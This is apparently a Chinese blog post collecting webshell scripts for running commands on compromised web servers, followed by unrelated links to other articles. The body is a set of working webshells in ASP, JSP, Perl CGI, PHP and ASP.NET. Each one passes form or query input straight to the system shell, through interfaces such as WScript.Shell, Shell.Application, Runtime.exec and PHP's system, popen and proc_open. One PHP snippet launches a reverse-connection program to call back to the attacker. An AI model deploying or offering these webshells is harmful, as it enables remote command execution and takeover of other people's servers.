cmd1.asp

<object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<% end if %>

<form method="post">

<input type=text name="cmdx" size= value="C:\Documents and Settings\All Users\cmd.exe"><br>

<input type=text name="cmd" size= value="<%=request.form("cmd")%>"><br>

<input type=submit value="cmd命令"></form>

<textarea readonly cols= rows=>

<%On Error Resume Next

if request.form("cmdx")="C:\Documents and Settings\All Users\cmd.exe" then

response.write shell.exec("cmd.exe /c"&request.form("cmd")).stdout.readall

end if

response.write shell.exec(request.form("cmdx")&" /c"&request.form("cmd")).stdout.readall

%>

</textarea>

cmd2.asp

<center><%response.write "<font size=4 color=red>shellapplication执行命令 无回显</font>" %>

<BR>程序所在的物理路径:

<%response.write request.servervariables("APPL_PHYSICAL_PATH")%> </center>

<html><title>shellapplication执行命令 by kyo327 </title>

<body><br/><center>

<form action="<%= Request.ServerVariables("URL") %>" method="POST">

<br>程序路径:<br/>

<input type=text name=text1 size= value="C:\Documents and Settings\All Users\Documents\cmd.exe"> <br/>

参数:<br/><input type=text name=text2 size= value="<%=canshu%>"><br/>

<input type=submit name=makelove value=运行>

</form> </center></body> </html>

<%

appnames = Request.Form("text1")

canshu = Request.Form("text2")

if appnames<>"" then

set kyoshell=createobject("shell.application")

kyoshell.ShellExecute appnames,canshu,"","open",

response.write "<center>执行成功!</center>"

end if

%>

cmd.jsp

<%@ page import="java.io.*" %>

<%

    try {

            String cmd = request.getParameter("cmd");

            Process child = Runtime.getRuntime().exec(cmd);

            InputStream in = child.getInputStream();

            int c;

            while ((c = in.read()) != -1) {

                out.print((char)c);

            }

            in.close();

            try {

                child.waitFor();

            } catch (InterruptedException e) {

                e.printStackTrace();

            }

        } catch (IOException e) {

            System.err.println(e);

        }

%>

cmd.cgi

#!/usr/bin/perl

read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});

($key,$command)=split(/=/,$POST);

$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;

$command=~s/\+/ /;

$output=system "$command>a.txt";

$output=~s/\n/\<br\>/;

print "Content-Type: text/html\n\n";

print <<EOF;

<form action="" method=POST>

<input type=text size= name=command value=""><br>

<input type=submit value=ok>

</form>

EOF

open(OUTPUT,"a.txt")||die "cannot open $!";

@output=<OUTPUT>;

print <<EOF;

<textarea name="textfield" cols="80" rows="60">@output</textarea>

EOF

close OUTPUT;

unlink ("a.txt");

exit;

cmd.cfm

#!/usr/bin/perl

read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});

($key,$command)=split(/=/,$POST);

$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;

$command=~s/\+/ /;

$output=system "$command>a.txt";

$output=~s/\n/\<br\>/;

print "Content-Type: text/html\n\n";

print <<EOF;

<form action="" method=POST>

<input type=text size= name=command value=""><br>

<input type=submit value=ok>

</form>

EOF

open(OUTPUT,"a.txt")||die "cannot open $!";

@output=<OUTPUT>;

print <<EOF;

<textarea name="textfield" cols="80" rows="60">@output</textarea>

EOF

close OUTPUT;

unlink ("a.txt");

exit;

cmd1.php

<?php

        if (key($_GET)=="system") {

            system($_GET['system']);

        } elseif (key($_GET)=="passthru") {

            passthru($_GET['passthru']);

        } elseif (key($_GET)=="exec") {

            $result = exec($_GET['exec']);

            echo $result;

        } elseif (key($_GET)=="shell_exec") {

            $result=shell_exec($_GET['shell_exec']);

            echo $result;

        } elseif (key($_GET)=="popen") {

            $pp = popen($_GET['popen'], 'r');

            $read = fread($pp, 2096);

            echo $read;

            pclose($pp);

        } elseif (key($_GET)=="wscript") {

            $wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed");

            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript']."");

            $stdout = $exec->StdOut();

            $stroutput = $stdout->ReadAll();

            echo $stroutput;

        } elseif(key($_GET)=="proc_open"){

$descriptorspec = array(

   0 => array("pipe", "r"),

   1 => array("pipe", "w"),

   2 => array("pipe", "w")

);

$process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes);

if (is_resource($process)) {

    fwrite($pipes[0], "".$_GET['proc_open']."\r\n");

    fwrite($pipes[0], "exit\r\n");

    fclose($pipes[0]);

    while (!feof($pipes[1])) {

        echo fgets($pipes[1], 1024);

    }

    fclose($pipes[1]);

    while (!feof($pipes[2])) {

        echo fgets($pipes[2], 1024);

      }

    fclose($pipes[2]);

    proc_close($process);

}}

?>

cmd2.php

<?php

$wsh = new COM('Shell.Application') or die("Shell.Application");

$exec = $wsh->open("C:\\Docume~1\\alluse~1\\Documents\\fanlian.exe");

//没有回显,多了个fanlian进程,可以直接执行一个反向连接程序反弹回来

?>

cmd1.aspx

<%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %>

<html xmlns="http://www.w3.org/1999/xhtml" >

<head id="Head1" runat="server">

<title>cmdshell</title></head>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<script language="C#" runat="server">

  void Button_Click1(object sender, EventArgs e)

    {

        try

        {

            Process shell = new Process();

            shell.StartInfo.FileName = PathTextBox.Text;

            shell.StartInfo.Arguments = ShellTextBox.Text;

            shell.StartInfo.UseShellExecute = false;

            shell.StartInfo.RedirectStandardInput = true;

            shell.StartInfo.RedirectStandardOutput = true;

            shell.StartInfo.RedirectStandardError = true;

            shell.Start();

            string str1 = shell.StandardOutput.ReadToEnd();

            str1 = str1.Replace("<", "&lt;");

            str1 = str1.Replace(">", "&gt;");

            myLabel.Text = "<hr><pre>" + str1 + "</pre>";

        }

        catch (Exception Error)

        {

            Bin_Error(Error.Message);

        }

    }

</script>

<body>

<center><font size= color=red>asp.net命令执行 by kyo</font><br /></center>

<form id="form1" runat="server"><div style="text-align: center">

<asp:Panel ID="CmdPanel" runat="server" Height="50px" Width="800px"><hr />

程序路径 :<asp:TextBox ID="PathTextBox" runat="server" Width="395px">C:\Documents and Settings\All Users\Documents\cmd.exe</asp:TextBox><br />

命令参数 :<asp:TextBox ID="ShellTextBox" runat="server" Width="395px">/c ver</asp:TextBox><br />

<asp:Button ID="RunButton" runat="server" OnClick="Button_Click1" Text="运行" /></div>

<div style="text-align: left">

<asp:Label ID="myLabel" runat="server" EnableViewState="False"></asp:Label></div>

<hr /></asp:Panel></form></body>

</html>

cmd2.aspx

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%>

<script runat="server">

sub run(Src As Object, E As EventArgs)

         Dim StrResult As String

         Dim shell As Object

         shell = Server.CreateObject("WScript.Shell")

         StrResult = shell.exec( path.Text & " /c " & box.Text ).stdout.readall

         StrResult =  Replace(StrResult , "<","&lt;")

         StrResult =  Replace(StrResult , ">","&gt;")

         ResultLabel.Text = "<pre>" & StrResult & "</pre>"

end sub

</script>

<html><head></head><body>

<form runat="server">

程序路径:<asp:TextBox ID="path" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe"

runat="server" />

<br>命令参数:<asp:TextBox ID="box" Width="" runat="server" />

<asp:Button ID="Button" Text="Run" OnClick="run" runat="server" /><br>

<asp:Label ID="ResultLabel" runat="server" />

</form></body></html>

cmd3.aspx

<!--

Titel:  shell.application

Author: kyo327

Date:  --

-->

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %>

<script runat="server">

sub run(Src As Object, E As EventArgs)

        Dim appName As String

        Dim appArgs As String

        Dim love As Object

        love = Server.CreateObject("Shell.Application")

        appName = appnames.Text

        appArgs = canshu.Text

        love.ShellExecute(appName, appArgs, "", "open", )

end sub

</script><html>

<head><title>shellapplication For ASP.NET By kyo327</title></head>

<body><form id="Form1" runat="server">

<center><font color=red size=>利用shell.application执行命令for asp.net</font><br />

<br>程序路径名:<br />

<asp:TextBox ID="appnames" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" />  <br>参数:<br />

<asp:TextBox ID="canshu" Width="" runat="server" /> <br /><br />

<asp:Button ID="Button" Text="运行" OnClick="run" runat="server" /><br>

</form></center></body></html>

webshell下执行命令脚本汇集的更多相关文章

  1. 在shell下执行命令的方法

    在shell下执行命令的方法 1. #!/bin/sh 语法:在shell.sh的开头写入 #!/bin/sh 一般的shell脚本就是这种用法.这种方法调用脚本开头的shell执行命令,子shell ...

  2. expect实现远程主机自动执行命令脚本

    2014年第一个脚本,哈哈!!! expect实现远程主机自动执行命令脚本: #!/usr/bin/expect -- if { [llength $argv] < 4 } { puts &qu ...

  3. MySQL命令行下执行.sql脚本详解

    本文主要介绍一个在MySQL命令行下执行脚本文件的例子,通过这个例子让我们来了解一下在命令行下MySQL是怎样执行脚本的吧.现在我们开始介绍这一过程. 1.首先编写sql脚本,保存为的:book.sq ...

  4. Linux 下执行Shell 脚本的方式

    Shell 脚本的执行方式通常有如下三种: (1)bash script-name 或者 sh script-name:(2)path/script-name或者./script-name:(3)so ...

  5. 解决方法:loadrunner 场景下执行webservice脚本是---报错10492 Error: Exception was raised when calling per-process-init function in extens

    在vug下执行时,脚本无异常,但是在controller下执行时报下面错误,网上查了下,解决方法千奇百怪,但无一可行. 分析了下错误,似乎是初始化进程有关.想到rts中的设置习惯时以线程方式执行. 遂 ...

  6. 在Linux下执行Jmeter脚本

    前言 Jmeter这款接口测试工具,已经在越来越多的公司被要求会使用了. 而且,现在应该部分小伙伴们都开始用起来了. 但是,你们知道除了在Windows用图形化界面的Jmeter执行脚本之外,还有其他 ...

  7. 曲演杂坛--SQLCMD下执行命令失败但没有任何错误提示的坑

    今天使用SQLCMD导入到SQL SERVER数据库中,看着数据文件都成功执行,但是意外发现有一个文件数据没有成功导入,但执行不报错,很容易导致问题被忽略. 使用存在问题的文件做下测试,从界面上看几行 ...

  8. shell中使用expect命令进行远程执行命令脚本

    expect是用来实现自动交互功能的工具之一,使用expect-send来实现交互过程. 注意: 1.脚本的执行方法与bash shell不一样,比如:expect example.sh 2.向一个脚 ...

  9. linux下执行sh脚本,提示Command not found解决办法

    1.确保用户对文件有读写及执行权限 oracle@linux-106:~/RMAN/bin> chmod a+x test.sh 2.然后修改文件格式(如果是从winodws搬过来的会显示dos ...

随机推荐

  1. Jmeter之csv、用户自定义变量以及Query Type分析(八)

    很多童鞋不知道对于Jmeter的Query Type 不知道选哪个,为什么选,怎么选! 下面这边做个简单的分析, 那么首先什么是CSV Data Set Config,有什么用呢? CSV Data ...

  2. hive中大表join

    排序存储数据至BUCKETS,这样可以顺序进行join

  3. Linux定时,计划任务cron

    假如你有一些任务要定期执行,比如清理磁盘.删除过期文件.发送邮件和提醒,这个时候可以用cron来实现. crond是后台进程,而crontab则是定制好的计划任务表. 启动与停止 查看状态/sbin/ ...

  4. poj 1651 Multiplication Puzzle (区间dp)

    题目链接:http://poj.org/problem?id=1651 Description The multiplication puzzle is played with a row of ca ...

  5. HTML5 重要标签以及属性学习

    1.一个标签可以有多个,class=“A B C ” 效果: 2.padding的扩展:当padding的值是正的时候,元素显示的大小会变大:当padding的值是负的时候,元素显示的大小会变小 pa ...

  6. 07 JavaWeb

    软件开发的两种架构:c/s和b/s          * C/S     client/server     客户端/服务器     例子:QQ     快播     暴风影音...          ...

  7. js渐隐渐入渐出效果 fadeOut fadeIn

    //fadeOut //function start function fadeOut(ele,speed){ var ele=document.getElementById(ele); var op ...

  8. zoj 3795 Grouping tarjan缩点 + DGA上的最长路

    Time Limit:2000MS     Memory Limit:65536KB     64bit IO Format:%lld & %llu Submit Status Practic ...

  9. (转)POJ题目分类

    初期:一.基本算法:     (1)枚举. (poj1753,poj2965)     (2)贪心(poj1328,poj2109,poj2586)     (3)递归和分治法.     (4)递推. ...

  10. discuz安装步骤

    1.下载full安装包http://www.comsenz.com/downloads/install/discuz/ 下载好了以后,解压文件.把upload中的所有文件,复制到你服务器网站目录下. ...